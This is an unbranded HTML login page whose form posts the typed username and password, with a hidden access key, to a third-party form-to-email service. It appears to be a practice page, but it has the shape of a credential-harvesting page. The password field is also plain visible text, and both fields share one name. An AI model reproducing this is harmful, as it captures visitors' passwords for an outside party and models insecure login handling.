<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <link rel="stylesheet" href="styles.css">
</head>
<body>
  <div class="wrapper">
    <form action="https://api.web3forms.com/submit" method="POST">
      <input type="hidden" name="access_key" value="9bd63cd2-47b4-4b78-8525-26095a4c0d12">
      <h1>Login</h1>
      <div class="input-box">
        <label> Email or Username:</label>
        <input type="text" name="name" placeholder="Email or Username" required>
      </div>
      <div class="input-box">
        <input type="text" name="name" placeholder="Password" required>
      </div>
      <div class="remember-forgot">
        <label><input type="checkbox">Remember Me</label>
        <a href="#">Forgot Password</a>
      </div>
      <button type="submit" class="btn">Login</button>
      <div class="register-link">
        <p>Dont have an account? <a href="#">Register</a></p>
      </div>
    </form>
  </div>
</body>
</html>
